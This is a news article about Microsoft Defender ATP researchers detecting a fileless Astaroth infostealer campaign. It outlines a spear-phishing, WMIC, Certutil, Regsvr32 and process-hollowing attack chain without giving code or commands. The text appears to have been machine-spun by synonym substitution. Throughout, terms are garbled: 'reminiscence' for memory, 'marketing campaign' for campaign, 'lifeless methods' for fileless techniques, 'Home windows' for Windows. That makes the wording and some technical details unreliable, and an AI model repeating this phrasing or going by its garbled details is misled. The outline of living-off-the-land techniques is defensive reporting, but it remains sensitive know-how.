A fileless malware marketing campaign utilized by attackers to drop the data stealing Astaroth Trojan into the reminiscence of contaminated computer systems was detected by Microsoft Defender ATP Analysis Group researchers.
The Astaroth Trojan and data stealer is a malware pressure able to stealing delicate info reminiscent of consumer credentials from its victims utilizing a key logger module, working system calls interception, and clipboard monitoring.
Astaroth can also be recognized for abusing living-off-the-land binaries (LOLbins) such because the command line interface of the Home windows Administration Instrumentation Command-line (WMIC) to stealthily obtain and set up malware payloads within the background.
We not too long ago unearthed a marketing campaign that fully “lived off the land” all through a posh assault chain that ran the info-stealing backdoor #Astaroth instantly in reminiscence. See how #MicrosoftDefenderATP next-gen safety defeated the #fileless assault: https://t.co/c2G53Ll2kf
— Microsoft Safety Intelligence (@MsftSecIntel) July eight, 2019
The malware marketing campaign found by the Microsoft Defender ATP Analysis Group makes use of a number of lifeless methods and a multi-stage an infection course of that begins with a spear-phishing e mail containing a malicious hyperlink that leaded the potential victims to an LNK file.
The malicious payloads downloaded within the background are all Base64-encoded and get decoded on the compromised programs utilizing the authentic Certutil instrument within the type of 4 DLLs that might be loaded with the assistance of the Regsvr32 instrument.
The loaded DLL file will subsequently load a second DLL in reminiscence that may reflectively load a 3rd one, designed to decrypt and inject one more DLL into Userinit. This fourth DLL acts as a proxy which is able to reflectively load a fifth DLL into reminiscence utilizing course of hollowing.
This fifth and final DLL file is the ultimate Astaroth infostealer Trojan malware payload that may acquire and exfiltrate varied varieties of delicate information from its victims to command-and-control (C2) servers managed by the attackers.
“It’s fascinating to notice that at no level through the assault chain is any file run that’s not a system instrument. This system is named dwelling off the land: utilizing authentic instruments which can be already current on the goal system to masquerade as common exercise,” added the researchers.
Microsoft’s researchers describe solely the preliminary and execution levels of the malware assault of their report on condition that they solely targeted on how the Trojan an infection was detected and blocked by Microsoft Defender ATP.
The protection options and applied sciences utilized by Microsoft Defender ATP to cease the an infection are detailed in a graph detailing stage-by-stage the options used to determine and stop an Astaroth an infection on affected Home windows computer systems.
Microsoft Defender ATP Analysis Group additionally enumerates the methods used within the Astaroth fileless malware assault on every an infection stage and the Home windows instruments employed to stealthily unfold the an infection on compromised programs.
As Microsoft Defender ATP Analysis’s Andrea Lelli concluded, “abusing fileless methods doesn’t put malware past the attain or visibility of safety software program. Quite the opposite, among the fileless methods could also be so uncommon and anomalous that they draw fast consideration to the malware, in the identical approach that a bag of cash transferring by itself would.”
Again in February, one other Astaroth marketing campaign was noticed by Cybereason whereas exploiting safety and anti-malware options, in addition to living-off-the-land methods and abusing living-off-the-land binaries (LOLbins) to steal info from European and Brazilian targets.
Cofense’s Phishing Protection Heart (PDC) additionally noticed a malspam marketing campaign distributing Astaroth in September 2018 and completely focusing on South American victims, with round eight,000 machines probably compromised inside a single week of assaults.
Replace July 09: Added information on the Astaroth marketing campaign found by Cofense in 2018.